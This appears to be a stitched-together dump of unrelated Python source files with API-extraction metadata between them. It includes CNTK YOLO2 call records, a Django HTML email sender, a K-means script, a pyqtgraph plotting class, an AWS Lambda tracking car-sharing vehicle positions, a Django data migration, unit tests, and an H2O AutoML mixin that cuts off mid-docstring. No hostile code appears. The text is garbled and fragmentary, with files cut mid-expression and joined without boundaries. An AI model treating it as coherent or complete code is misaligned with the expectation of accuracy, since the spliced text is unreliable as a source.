l2_regularization_weight=l2_reg_weight)\n", (4818, 4935), True, 'import cntk as C\n'), ((5425, 5517), 'cntk.Trainer', 'C.Trainer', (["network['output']", "(network['ce'], network['pe'])", 'parameter_learner', 'printer'], {}), "(network['output'], 
(network['ce'], network['pe']),\n parameter_learner, printer)\n", (5434, 5517), True, 'import cntk as C\n'), ((6851, 6898), '_cntk_py.set_computation_network_trace_level', '_cntk_py.set_computation_network_trace_level', (['(0)'], {}), '(0)\n', (6895, 6898), False, 'import _cntk_py\n'), ((8143, 8169), 'os.path.exists', 'os.path.exists', (['train_file'], {}), '(train_file)\n', (8157, 8169), False, 'import os\n'), ((8267, 8292), 'os.path.exists', 'os.path.exists', (['test_file'], {}), '(test_file)\n', (8281, 8292), False, 'import os\n'), ((937, 963), 'os.path.exists', 'os.path.exists', (['image_file'], {}), '(image_file)\n', (951, 963), False, 'import os\n'), ((1044, 1069), 'os.path.exists', 'os.path.exists', (['rois_file'], {}), '(rois_file)\n', (1058, 1069), False, 'import os\n'), ((1239, 1343), 'cntk.io.transforms.scale', 'xforms.scale', ([], {'width': 'image_width', 'height': 'image_height', 'channels': 'num_channels', 'interpolations': '"""linear"""'}), "(width=image_width, height=image_height, channels=num_channels,\n interpolations='linear')\n", (1251, 1343), True, 'import cntk.io.transforms as xforms\n'), ((3614, 3688), 'yolo2.Yolo2Error', 'yolo2.Yolo2Error', (['z', 'label_var'], {'class_size': 'num_classes', 'priors': 'anchor_dims'}), '(z, label_var, class_size=num_classes, priors=anchor_dims)\n', (3630, 3688), False, 'import yolo2\n'), ((3719, 3844), 'yolo2.Yolo2Metric', 'yolo2.Yolo2Metric', (['z', 'label_var'], {'class_size': 'num_classes', 'priors': 'anchor_dims', 'metricMethod': 'yolo2.Yolo2MetricMethod.Avg_iou'}), '(z, label_var, class_size=num_classes, priors=anchor_dims,\n metricMethod=yolo2.Yolo2MetricMethod.Avg_iou)\n', (3736, 3844), False, 'import yolo2\n'), ((8811, 8838), 'os.path.exists', 'os.path.exists', (['anchor_data'], {}), '(anchor_data)\n', (8825, 8838), False, 'import os\n'), ((1433, 1512), 'cntk.io.transforms.color', 'xforms.color', ([], {'brightness_radius': '(0.2)', 'contrast_radius': '(0.2)', 'saturation_radius': '(0.2)'}), 
'(brightness_radius=0.2, contrast_radius=0.2, saturation_radius=0.2)\n', (1445, 1512), True, 'import cntk.io.transforms as xforms\n'), ((7025, 7062), 'os.path.join', 'os.path.join', (['model_path', 'log_to_file'], {}), '(model_path, log_to_file)\n', (7037, 7062), False, 'import os\n'), ((8701, 8718), 'numpy.array', 'np.array', (['anchors'], {}), '(anchors)\n', (8709, 8718), True, 'import numpy as np\n'), ((6197, 6253), 'cntk.TestConfig', 'C.TestConfig', (['test_source'], {'minibatch_size': 'minibatch_size'}), '(test_source, minibatch_size=minibatch_size)\n', (6209, 6253), True, 'import cntk as C\n'), ((6120, 6156), 'os.path.join', 'os.path.join', (['model_path', 'model_name'], {}), '(model_path, model_name)\n', (6132, 6156), False, 'import os\n')] |
from django.core.mail import EmailMessage
from django.conf import settings
def send_email(name, date, email):
    """Send the OpenInfra Days Korea 2018 invitation-ticket confirmation mail.

    Arguments:
        name: recipient display name interpolated into the HTML body.
        date: attendance date shown in the body.
        email: destination email address.

    Returns the number of messages sent (0 or 1), as reported by Django.
    """
    # HTML body template; {0} = name, {1} = date (filled via .format below).
    txt = """
    <html>
        <body>
            <table cellpadding='0' cellspacing='0' width='100%' border='0'>
                <tbody>
                <tr>
                    <td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:10px' align='left'>
                        <div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
                            안녕하세요 <span style='color:#3832D8'>{0}</span> 님,
                        </div>
                    </td>
                </tr>
                <tr>
                    <td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:10px' align='left'>
                        <div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:30px;line-height:1.3;letter-spacing:-1.1px; text-align:left'>
                            OpenInfra Days Korea 2018
                        </div>
                    </td>
                </tr>
                <tr>
                    <td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:30px' align='left'>
                        <div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
                            초청 티켓 등록이 완료되었습니다.
                        </div>
                    </td>
                </tr>
                <tr>
                    <td style='word-wrap:break-word;font-size:0px;padding:0px;padding-bottom:30px' align='left'>
                        <div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
                            참가 일자 : {1}
                        </div>
                    </td>
                </tr>
                <tr>
                    <td style='word-wrap:break-word;font-size:0px;padding:0px' align='left'>
                        <div style='color:#000000;font-family:Spoqa Han Sans,sans-serif;font-size:20px;line-height:22px;letter-spacing:-0.8px;text-align:left'>
                            <a href="http://invite.openinfradays.kr">티켓 확인</a>
                        </div>
                    </td>
                </tr>
                </tbody>
            </table>
        </body>
    </html>
    """.format(name, date)
    # NOTE: `email` is rebound here from the address string to the message
    # object; the address was already captured in the `to` tuple.
    email = EmailMessage(settings.EMAIL_TITLE, txt, to=(email,))
    email.content_subtype = "html"  # deliver the body as text/html
    return email.send()
| [
"django.core.mail.EmailMessage"
] | [((2019, 2071), 'django.core.mail.EmailMessage', 'EmailMessage', (['settings.EMAIL_TITLE', 'txt'], {'to': '(email,)'}), '(settings.EMAIL_TITLE, txt, to=(email,))\n', (2031, 2071), False, 'from django.core.mail import EmailMessage\n')] |
import KNN as K
# Run K-means (k = 3 seed centroids) on 3-D training data and plot clusters.
K.clearScreen()
dataTraining= K.loadData("dataTraining.txt")
X=dataTraining[:,0:3]  # first three columns form the feature vector
initial_centroids=K.listToArray([[3, 3,3],[6, 2,4],[8,5,7]])  # hand-picked seeds
idx=K.KMean_Run(X,initial_centroids,5)  # 5 iterations; idx = cluster per sample
K.SaveData(K.concatenateVectors(X,idx))  # persist points with their cluster id
K.plotKNN2(X,idx)
| [
"KNN.concatenateVectors",
"KNN.plotKNN2",
"KNN.listToArray",
"KNN.loadData",
"KNN.KMean_Run",
"KNN.clearScreen"
] | [((20, 35), 'KNN.clearScreen', 'K.clearScreen', ([], {}), '()\n', (33, 35), True, 'import KNN as K\n'), ((50, 80), 'KNN.loadData', 'K.loadData', (['"""dataTraining.txt"""'], {}), "('dataTraining.txt')\n", (60, 80), True, 'import KNN as K\n'), ((124, 172), 'KNN.listToArray', 'K.listToArray', (['[[3, 3, 3], [6, 2, 4], [8, 5, 7]]'], {}), '([[3, 3, 3], [6, 2, 4], [8, 5, 7]])\n', (137, 172), True, 'import KNN as K\n'), ((172, 208), 'KNN.KMean_Run', 'K.KMean_Run', (['X', 'initial_centroids', '(5)'], {}), '(X, initial_centroids, 5)\n', (183, 208), True, 'import KNN as K\n'), ((248, 266), 'KNN.plotKNN2', 'K.plotKNN2', (['X', 'idx'], {}), '(X, idx)\n', (258, 266), True, 'import KNN as K\n'), ((218, 246), 'KNN.concatenateVectors', 'K.concatenateVectors', (['X', 'idx'], {}), '(X, idx)\n', (238, 246), True, 'import KNN as K\n')] |
#!/usr/bin/env python
import pyqtgraph as pg
from pyqtgraph import ViewBox
from hummingbird.graphics.plotter_args import PlotBoxArgs
from hummingbird.graphics.state_plot import StatePlot
class StatePlotBox:
    """Wraps one pyqtgraph plot item and the StatePlot curves drawn in it."""

    def __init__(self, window, args):
        """ Create a new plotbox wrapper object

        Arguments:
            window (pg.GraphicsWindow): pyqtgraph window object in which to
                place this plotbox
            args (PlotboxArgs object): PlotboxArgs object which holds all the
                appropriate arguments for the plotbox

        Raises:
            TypeError: if args is not a PlotBoxArgs instance.
        """
        if not isinstance(args, PlotBoxArgs):
            raise TypeError('\'args\' argument must be of type PlotboxArgs')

        # Initialize plotbox
        if args.labels is not None:
            self.plotbox = window.addPlot(title=args.title, labels=args.labels)
        else:
            # No explicit labels: show the title on the left axis instead.
            self.plotbox = window.addPlot(labels={'left': args.title})

        # Handle dimension parameters. 1-D plots scroll in time; higher
        # dimensions are spatial and keep a 1:1 aspect ratio.
        self.dimension = len(args.plots[0].state_names)
        if self.dimension == 1:
            self.plotbox.setAutoVisible(y=True)
        else:
            self.plotbox.setAutoVisible(x=True, y=True)
            self.plotbox.setAspectLocked() # Lock x/y ratio to be 1

        # Handle color parameters
        self.set_axis_color(args.axis_color, args.axis_width)
        self.distinct_plot_hues = args.plot_hues
        self.plot_min_hue = args.plot_min_hue
        self.plot_max_hue = args.plot_max_hue
        self.plot_min_value = args.plot_min_value
        self.plot_max_value = args.plot_max_value

        if args.legend:
            self.add_legend()

        # Plots related to this plotbox, keyed by plot name.
        self.plots = {}
        for p in args.plots:
            self.add_plot(p)

        # Other args
        self.time_window = args.time_window

    def label_axes(self, x_label=None, y_label=None):
        """Set the bottom/left axis labels; a None argument leaves it alone."""
        if x_label is not None:
            self.plotbox.setLabel('bottom', x_label)
        if y_label is not None:
            self.plotbox.setLabel('left', y_label)

    def set_axis_color(self, color, width=1):
        """Apply a pen of the given color/width to both plot axes."""
        self.axis_pen = pg.mkPen(color=color, width=width)
        self.plotbox.getAxis("left").setPen(self.axis_pen)
        self.plotbox.getAxis("bottom").setPen(self.axis_pen)

    def add_legend(self):
        """Add a small legend anchored to the top-left plot corner."""
        self.plotbox.addLegend(size=(1, 1), offset=(1, 1))

    def add_plot(self, plot_args):
        """Create a StatePlot for plot_args, auto-assigning a color if unset."""
        if plot_args.color is None:
            plot_args.set_color(self._get_color(len(self.plots)))
        self.plots[plot_args.name] = StatePlot(self.plotbox, plot_args)

    def get_states(self):
        """Return a merged dict of all states tracked by the child plots."""
        states = {}
        for p in self.plots.values():
            states.update(p.get_states())
        return states

    def get_xrange(self):
        """Return the current [min, max] x view range."""
        return self.plotbox.vb.targetRange()[0]

    def get_yrange(self):
        """Return the current [min, max] y view range."""
        return self.plotbox.vb.targetRange()[1]

    def update(self, t):
        """ Update the plot data and adjust viewing range

        Arguments:
            t (float): the current time in seconds. Used to adjust the rolling
                time window appropriately
        """
        for p in self.plots.values():
            p.update()
        if self.dimension == 1:
            # Scroll a fixed-width time window that ends at the current time.
            x_min = max(t - self.time_window, 0)
            x_max = t
            self.plotbox.setXRange(x_min, x_max)
            self.plotbox.enableAutoRange(axis=ViewBox.YAxis)
        else:
            self.plotbox.enableAutoRange(axis=ViewBox.XYAxes)
            # TODO: Add 3D support here

    def _get_color(self, index):
        """ Returns incremental plot colors based on index """
        return pg.intColor(index, minValue=self.plot_min_value, maxValue=self.plot_max_value,
                           hues=self.distinct_plot_hues, minHue=self.plot_min_hue, maxHue=self.plot_max_hue)
| [
"hummingbird.graphics.state_plot.StatePlot",
"pyqtgraph.intColor",
"pyqtgraph.mkPen"
] | [((2115, 2149), 'pyqtgraph.mkPen', 'pg.mkPen', ([], {'color': 'color', 'width': 'width'}), '(color=color, width=width)\n', (2123, 2149), True, 'import pyqtgraph as pg\n'), ((2531, 2565), 'hummingbird.graphics.state_plot.StatePlot', 'StatePlot', (['self.plotbox', 'plot_args'], {}), '(self.plotbox, plot_args)\n', (2540, 2565), False, 'from hummingbird.graphics.state_plot import StatePlot\n'), ((3605, 3774), 'pyqtgraph.intColor', 'pg.intColor', (['index'], {'minValue': 'self.plot_min_value', 'maxValue': 'self.plot_max_value', 'hues': 'self.distinct_plot_hues', 'minHue': 'self.plot_min_hue', 'maxHue': 'self.plot_max_hue'}), '(index, minValue=self.plot_min_value, maxValue=self.\n plot_max_value, hues=self.distinct_plot_hues, minHue=self.plot_min_hue,\n maxHue=self.plot_max_hue)\n', (3616, 3774), True, 'import pyqtgraph as pg\n')] |
import json
# Load the first line of quizoutput.txt as JSON and rewrite the file with
# the serialized result.
print('start')
with open('quizoutput.txt') as f:
    lines = f.readlines()
print('loaded quiz data')
print('changing to json')
json_output = json.loads(lines[0])
print(json_output)
with open('quizoutput.txt', 'w') as f:
    # Bug fix: file.write() requires a str, but json.loads() returns a
    # dict/list, so the original raised TypeError here.  Serialize the
    # parsed value back to JSON before writing.
    json.dump(json_output, f)
# for item in json_output:
#     print(item['question'])
# print('done')
| [
"json.loads"
] | [((166, 186), 'json.loads', 'json.loads', (['lines[0]'], {}), '(lines[0])\n', (176, 186), False, 'import json\n')] |
#!/usr/bin/python
import requests
import boto3
import time
import geopy.distance
import xml.etree.ElementTree as ET
import itertools
import sys
import pickle
S3_BUCKET = "panku-gdzie-jestes-latest-storage"
class LatestPositionStorage(object):
    """Persists the most recent known vehicle positions for one service in S3."""

    def __init__(self, service):
        # One S3 object per service, e.g. "PANEK.latest".
        self.objectName = "%s.latest" % service

    def getLatestPositionsForService(self):
        """Load the pickled position dict from S3; return {} on any failure."""
        s3 = boto3.resource('s3')
        try:
            obj = s3.Object(S3_BUCKET, self.objectName)
            ret = pickle.loads(obj.get()['Body'].read())
            print("Read %d positions from S3" % len(ret))
            return ret
        except Exception:
            # Bug fix: the bare `except:` also swallowed SystemExit and
            # KeyboardInterrupt; only ordinary errors are treated as
            # "no snapshot yet".
            # NOTE(review): pickle.loads on S3 content is unsafe if the
            # bucket can be written by untrusted parties — confirm access.
            print("Unexpected error:", sys.exc_info())
            return {}

    def saveLatestPositionsForService(self, positions):
        """Pickle *positions* and store them at this service's S3 key."""
        s3 = boto3.resource('s3')
        print("Saving %d positions to S3" % (len(positions)))
        pickle_byte_obj = pickle.dumps(positions)
        s3.Object(S3_BUCKET, self.objectName).put(Body=pickle_byte_obj)
s3.Object(S3_BUCKET, self.objectName).put(Body=pickle_byte_obj)
class Service(object):
    """Base class for a car-sharing tracker: subclasses provide locations,
    this class diffs them against the last S3 snapshot and records moves
    in the DynamoDB 'cars' table."""

    def getSecretName(self):
        """Name of the AWS Secrets Manager secret holding the credentials."""
        pass

    def getCredentials(self):
        """Fetch [username, password] from AWS Secrets Manager."""
        secret_name = self.getSecretName()
        region_name = "eu-west-1"
        session = boto3.session.Session()
        client = session.client(service_name='secretsmanager', region_name=region_name)
        get_secret_value_response = client.get_secret_value(SecretId=secret_name)
        # The secret is a one-entry JSON object; strip the JSON punctuation
        # and split on ':' to get [username, password].
        return get_secret_value_response["SecretString"].replace('"', '').replace("{","").replace("}", "").split(":")

    def identifierPerRegistration(self, registration):
        """Map a vehicle registration to a globally unique car id."""
        pass

    def serviceId(self):
        # TODO: reverse it, let subclasses override this, and implement `identifierPerRegistration` here in the superclass
        return self.identifierPerRegistration("").strip()

    def getLatestPositions(self):
        """Load the last saved positions for this service from S3."""
        return LatestPositionStorage(self.serviceId()).getLatestPositionsForService()

    def saveLatestPositions(self, positions):
        """Persist the latest positions for this service to S3."""
        return LatestPositionStorage(self.serviceId()).saveLatestPositionsForService(positions)

    def saveLocations(self, cars):
        """Record every car that moved more than ~100 m since the snapshot.

        Arguments:
            cars: iterable of (registration, {'lng': float, 'lat': float}).
        """
        now = int(time.time())
        latestPositions = self.getLatestPositions()
        newPositions = latestPositions.copy()
        table = boto3.resource('dynamodb', region_name='eu-west-1').Table('cars')
        # (An unused boto3 DynamoDB *client* was created here; removed.)
        for (registration, position) in cars:
            key = self.identifierPerRegistration(registration)
            latestPosition = latestPositions.get(key)
            shouldAdd = True
            existedBefore = latestPosition is not None
            if existedBefore:
                prevPosition = (latestPosition['long'], latestPosition['lat'])
                currentPosition = (position['lng'], position['lat'])
                # NOTE(review): geopy removed `vincenty` in 2.0 in favor of
                # `geodesic` — confirm the pinned geopy version.
                distance = geopy.distance.vincenty(prevPosition, currentPosition).km
                if distance < 0.1:
                    shouldAdd = False
            if shouldAdd:
                print("%s moved" % key)
                if existedBefore:
                    # Write the previous point one second earlier, presumably
                    # so the history forms a path segment — TODO confirm.
                    r = table.put_item(Item = {'carId' : key, 'date' : now-1,'long': prevPosition[0], 'lat': prevPosition[1]})
                r = table.put_item(Item = {'carId' : key, 'date' : now, 'long': "%8.6f" % position['lng'], 'lat': "%8.6f" % position['lat']})
                newPositions[key] = {'long': "%8.6f" % position['lng'], 'lat': "%8.6f" % position['lat']}
        self.saveLatestPositions(newPositions)

    def getAndSaveLocations(self):
        """Fetch current locations from the subclass and persist them."""
        self.saveLocations(self.getLocations())
class Panek(Service):
    """Panek CarSharing: scrapes vehicle positions from the customer panel."""

    def getSecretName(self):
        return "panek/login"

    def identifierPerRegistration(self, registration):
        return "PANEK " + registration

    def getLocations(self):
        """Log in to panel.panekcs.pl and return (registration, position) pairs.

        Positions come from the GetLocations endpoint; the Coordinates
        entries carry 'lng'/'lat' keys consumed by Service.saveLocations.
        """
        s = requests.Session()
        s.headers.update({"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0",
                      "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                      "Accept-Language": "en-GB,en;q=0.7,en-US;q=0.3",
                      "Upgrade-Insecure-Requests": "1",
                      "DNT": "1",
                      })
        # Prime session cookies before posting the login form.
        s.get("https://panel.panekcs.pl/security/login")
        username, password = self.getCredentials()
        r = s.post(url = "https://panel.panekcs.pl/security/login", data={"UserName": username, "Password": password})
        assert r.status_code == 200
        r = s.post(url = "https://panel.panekcs.pl/Home/GetLocations", data = {})
        assert r.status_code == 200
        locations = r.json()
        # Under Vehicles: [u'Category', u'FuelRange', u'Ids', u'Coordinates', u'RegistrationNumber', u'Fuel']
        # (An unused `count` local was removed here.)
        coordinates = locations['Vehicles']['Coordinates']
        registrations = locations['Vehicles']['RegistrationNumber']
        return zip(registrations, coordinates)
class Veturilo(Service):
    """Veturilo / Nextbike city bikes: reads the public station XML feed."""

    def identifierPerRegistration(self, registration):
        return "VETURILO " + registration

    def getLocations(self):
        """Return (bike number, position) pairs for every docked bike."""
        session = requests.Session()
        # Browser-like headers, applied to every request of this session.
        session.headers.update({"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0",
                                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                                "Accept-Language": "en-GB,en;q=0.7,en-US;q=0.3",
                                "Upgrade-Insecure-Requests": "1",
                                "DNT": "1",
                                })
        response = session.get("https://nextbike.net/maps/nextbike-official.xml?city=372,210,475")
        assert response.status_code == 200
        root = ET.fromstring(response.content)
        # Every child of a <place> element is a bike docked there; all bikes
        # share that station's coordinates.
        return [
            (bike.get("number"),
             {"lng" : float(place.get("lng")), "lat": float(place.get("lat"))})
            for place in root.findall(".//place")
            for bike in place
        ]
class Traficar(Service):
    """Traficar: reads car positions from the public REST API."""

    def identifierPerRegistration(self, registration):
        return "TRAFICAR " + registration

    def getLocations(self):
        """Return (registration, position) pairs for every listed car."""
        session = requests.Session()
        # Browser-like headers, applied to every request of this session.
        session.headers.update({"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0",
                                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                                "Accept-Language": "en-GB,en;q=0.7,en-US;q=0.3",
                                "Upgrade-Insecure-Requests": "1",
                                "DNT": "1",
                                })
        response = session.get("https://api.traficar.pl/eaw-rest-api/car?shapeId=2")
        payload = response.json()
        return [(vehicle['regNumber'], {"lng": vehicle['longitude'], "lat":vehicle['latitude']})
                for vehicle in payload['cars']]
def lambda_handler(event, context):
    """AWS Lambda entry point: poll each car-sharing service and store positions."""
    for service in (Traficar, Veturilo, Panek):
        print("==== Service %s" % service)
        service().getAndSaveLocations()
    return "OK"
| [
"boto3.client",
"boto3.session.Session",
"requests.Session",
"pickle.dumps",
"sys.exc_info",
"boto3.resource",
"xml.etree.ElementTree.fromstring",
"time.time"
] | [((373, 393), 'boto3.resource', 'boto3.resource', (['"""s3"""'], {}), "('s3')\n", (387, 393), False, 'import boto3\n'), ((716, 736), 'boto3.resource', 'boto3.resource', (['"""s3"""'], {}), "('s3')\n", (730, 736), False, 'import boto3\n'), ((817, 840), 'pickle.dumps', 'pickle.dumps', (['positions'], {}), '(positions)\n', (829, 840), False, 'import pickle\n'), ((1082, 1105), 'boto3.session.Session', 'boto3.session.Session', ([], {}), '()\n', (1103, 1105), False, 'import boto3\n'), ((2158, 2207), 'boto3.client', 'boto3.client', (['"""dynamodb"""'], {'region_name': '"""eu-west-1"""'}), "('dynamodb', region_name='eu-west-1')\n", (2170, 2207), False, 'import boto3\n'), ((3506, 3524), 'requests.Session', 'requests.Session', ([], {}), '()\n', (3522, 3524), False, 'import requests\n'), ((4783, 4801), 'requests.Session', 'requests.Session', ([], {}), '()\n', (4799, 4801), False, 'import requests\n'), ((5338, 5362), 'xml.etree.ElementTree.fromstring', 'ET.fromstring', (['r.content'], {}), '(r.content)\n', (5351, 5362), True, 'import xml.etree.ElementTree as ET\n'), ((5733, 5751), 'requests.Session', 'requests.Session', ([], {}), '()\n', (5749, 5751), False, 'import requests\n'), ((1952, 1963), 'time.time', 'time.time', ([], {}), '()\n', (1961, 1963), False, 'import time\n'), ((2077, 2128), 'boto3.resource', 'boto3.resource', (['"""dynamodb"""'], {'region_name': '"""eu-west-1"""'}), "('dynamodb', region_name='eu-west-1')\n", (2091, 2128), False, 'import boto3\n'), ((619, 633), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (631, 633), False, 'import sys\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2017-12-08 18:42
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def update_questionnaires(apps, schema_editor):
    """
    Forward migration function to normalize settings into VMSettings and CloudSettings models.

    For each JobQuestionnaire, a CloudSettings row (named after the VM project)
    and a VMSettings row pointing at it are created (or reused), and the
    questionnaire is linked to the VMSettings row.
    :param apps: Django apps registry (historical models)
    :param schema_editor: unused
    :return: None
    """
    VMSettings = apps.get_model("data", "VMSettings")
    CloudSettings = apps.get_model("data", "CloudSettings")
    JobQuestionnaire = apps.get_model("data", "JobQuestionnaire")
    # (removed an unused lookup of the Job model)
    for q in JobQuestionnaire.objects.all():
        # Create a cloud settings object with the VM project from the questionnaire.
        # Object initially just has the project name as its name
        cloud_settings, _ = CloudSettings.objects.get_or_create(name=q.vm_project.name, vm_project=q.vm_project)
        vm_settings, _ = VMSettings.objects.get_or_create(name=q.vm_project.name, cloud_settings=cloud_settings)
        q.vm_settings = vm_settings
        q.save()
class Migration(migrations.Migration):
    """Data migration: runs after the schema migration that added the
    vm_settings column and back-fills VMSettings/CloudSettings rows."""
    dependencies = [
        ('data', '0039_1_schema_add_questionnare_vmsettings'),
    ]
    operations = [
        # Populate VMSettings and CloudSettings objects from JobQuestionnaire
        migrations.RunPython(update_questionnaires),
    ]
| [
"django.db.migrations.RunPython"
] | [((1361, 1404), 'django.db.migrations.RunPython', 'migrations.RunPython', (['update_questionnaires'], {}), '(update_questionnaires)\n', (1381, 1404), False, 'from django.db import migrations, models\n')] |
import os
import unittest
import json
import filecmp
from genofunk.sequence_utils import *
this_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))  # two directory levels above this test module; unused in the visible tests
class TestSequenceUtils(unittest.TestCase):
    """Tests for the coordinate-extraction and ORF helpers in sequence_utils."""

    def test_get_coordinates_from_json_simple_pairs(self):
        feature = {"start": 30, "end": 40, "strand": 1}
        self.assertEqual([[30, 40]],
                         get_coordinates_from_json(feature, pairs=True))

    def test_get_coordinates_from_json_simple_no_pairs(self):
        feature = {"start": 30, "end": 40, "strand": 1}
        self.assertEqual([30, 40],
                         get_coordinates_from_json(feature, pairs=False))

    def test_get_coordinates_from_json_join_pairs(self):
        feature = {"join": [{"start": 0, "end": 11, "strand": 1},
                            {"start": 10, "end": 20, "strand": 1}]}
        self.assertEqual([[0, 11], [10, 20]],
                         get_coordinates_from_json(feature, pairs=True))

    def test_get_coordinates_from_json_join_no_pairs(self):
        feature = {"join": [{"start": 0, "end": 11, "strand": 1},
                            {"start": 10, "end": 20, "strand": 1}]}
        self.assertEqual([0, 11, 10, 20],
                         get_coordinates_from_json(feature, pairs=False))

    def test_is_open_reading_frame_wrong_start(self):
        # Does not begin with methionine (M).
        self.assertFalse(is_open_reading_frame("NATIL*"))

    def test_is_open_reading_frame_wrong_end(self):
        # Residue after the trailing stop codon.
        self.assertFalse(is_open_reading_frame("MNATIL*S"))

    def test_is_open_reading_frame_stop_in_middle(self):
        self.assertFalse(
            is_open_reading_frame("MNATIL*S*", allow_stop_codons_in_middle=False))

    def test_is_open_reading_frame_stop_in_middle_allowed(self):
        self.assertTrue(
            is_open_reading_frame("MNATIL*S*", allow_stop_codons_in_middle=True))
"os.path.abspath"
] | [((136, 161), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (151, 161), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 13 09:52:47 2015
@author: wirkert
"""
import unittest
import os
import numpy as np
import msi.msimanipulations as msimani
from msi.io.nrrdreader import NrrdReader
from msi.io.nrrdwriter import NrrdWriter
from msi.test import helpers
class TestNrrdWriter(unittest.TestCase):
    """Round-trip tests: NrrdWriter output must be readable by NrrdReader."""

    def setUp(self):
        # Fixture image and the path the writer should produce.
        self.msi = helpers.getFakeMsi()
        self.fileUriToWrite = "testfile.nrrd"

    def tearDown(self):
        # Remove the file the test (hopefully) wrote.
        os.remove(self.fileUriToWrite)

    def test_imageWriterCreatesFile(self):
        NrrdWriter(self.msi).write(self.fileUriToWrite)
        self.assertTrue(os.path.isfile(self.fileUriToWrite),
                        "file was written to disk")

    def test_imageWriterCreatesCorrectFile(self):
        NrrdWriter(self.msi).write(self.fileUriToWrite)
        round_tripped = NrrdReader().read(self.fileUriToWrite)
        self.assertTrue(round_tripped == helpers.getFakeMsi(),
                        "image correctly written and read")

    def test_write_one_d_image_works(self):
        writer = NrrdWriter(self.msi)
        # Collapse the fake image to its mean spectrum before writing.
        msimani.calculate_mean_spectrum(self.msi)
        writer.write(self.fileUriToWrite)
        round_tripped = NrrdReader().read(self.fileUriToWrite)
        np.testing.assert_array_equal(round_tripped.get_image(),
                                      np.array([1, 2, 3, 4, 5]),
                                      "1d image correctly written and read")
| [
"msi.io.nrrdreader.NrrdReader",
"os.remove",
"os.path.isfile",
"numpy.array",
"msi.msimanipulations.calculate_mean_spectrum",
"msi.test.helpers.getFakeMsi",
"msi.io.nrrdwriter.NrrdWriter"
] | [((430, 450), 'msi.test.helpers.getFakeMsi', 'helpers.getFakeMsi', ([], {}), '()\n', (448, 450), False, 'from msi.test import helpers\n'), ((574, 604), 'os.remove', 'os.remove', (['self.fileUriToWrite'], {}), '(self.fileUriToWrite)\n', (583, 604), False, 'import os\n'), ((666, 686), 'msi.io.nrrdwriter.NrrdWriter', 'NrrdWriter', (['self.msi'], {}), '(self.msi)\n', (676, 686), False, 'from msi.io.nrrdwriter import NrrdWriter\n'), ((911, 931), 'msi.io.nrrdwriter.NrrdWriter', 'NrrdWriter', (['self.msi'], {}), '(self.msi)\n', (921, 931), False, 'from msi.io.nrrdwriter import NrrdWriter\n'), ((992, 1004), 'msi.io.nrrdreader.NrrdReader', 'NrrdReader', ([], {}), '()\n', (1002, 1004), False, 'from msi.io.nrrdreader import NrrdReader\n'), ((1242, 1262), 'msi.io.nrrdwriter.NrrdWriter', 'NrrdWriter', (['self.msi'], {}), '(self.msi)\n', (1252, 1262), False, 'from msi.io.nrrdwriter import NrrdWriter\n'), ((1271, 1312), 'msi.msimanipulations.calculate_mean_spectrum', 'msimani.calculate_mean_spectrum', (['self.msi'], {}), '(self.msi)\n', (1302, 1312), True, 'import msi.msimanipulations as msimani\n'), ((1373, 1385), 'msi.io.nrrdreader.NrrdReader', 'NrrdReader', ([], {}), '()\n', (1383, 1385), False, 'from msi.io.nrrdreader import NrrdReader\n'), ((753, 788), 'os.path.isfile', 'os.path.isfile', (['self.fileUriToWrite'], {}), '(self.fileUriToWrite)\n', (767, 788), False, 'import os\n'), ((1526, 1551), 'numpy.array', 'np.array', (['[1, 2, 3, 4, 5]'], {}), '([1, 2, 3, 4, 5])\n', (1534, 1551), True, 'import numpy as np\n'), ((1083, 1103), 'msi.test.helpers.getFakeMsi', 'helpers.getFakeMsi', ([], {}), '()\n', (1101, 1103), False, 'from msi.test import helpers\n')] |
import h2o
from h2o.base import Keyed
from h2o.exceptions import H2OValueError
from h2o.job import H2OJob
from h2o.model import ModelBase
from h2o.utils.typechecks import assert_is_type, is_type
class H2OAutoMLBaseMixin:
    # Shared behavior for AutoML handles (training instance and fetched-by-name
    # instance); subclasses supply the key/leader/leaderboard properties.
    def predict(self, test_data):
        """
        Predict on a dataset.
        :param H2OFrame test_data: Data on which to make predictions.
        :returns: A new H2OFrame of predictions.
        :examples:
        >>> # Set up an H2OAutoML object
        >>> aml = H2OAutoML(max_runtime_secs=30)
        >>> # Launch an H2OAutoML run
        >>> aml.train(y=y, training_frame=train)
        >>> # Predict with top model from AutoML Leaderboard on a H2OFrame called 'test'
        >>> aml.predict(test)
        >>>
        >>> # Get AutoML object by `project_name`
        >>> get_aml = h2o.automl.get_automl(aml.project_name)
        >>> # Predict with top model from AutoML Leaderboard on a H2OFrame called 'test'
        >>> get_aml.predict(test)
        """
        return self.leader.predict(test_data)
    # ---------------------------------------------------------------------------
    # Download POJO/MOJO with AutoML
    # ---------------------------------------------------------------------------
    def download_pojo(self, path="", get_genmodel_jar=False, genmodel_name=""):
        """
        Download the POJO for the leader model in AutoML to the directory specified by path.
        If path is an empty string, then dump the output to screen.
        :param path: An absolute path to the directory where POJO should be saved.
        :param get_genmodel_jar: if True, then also download h2o-genmodel.jar and store it in folder ``path``.
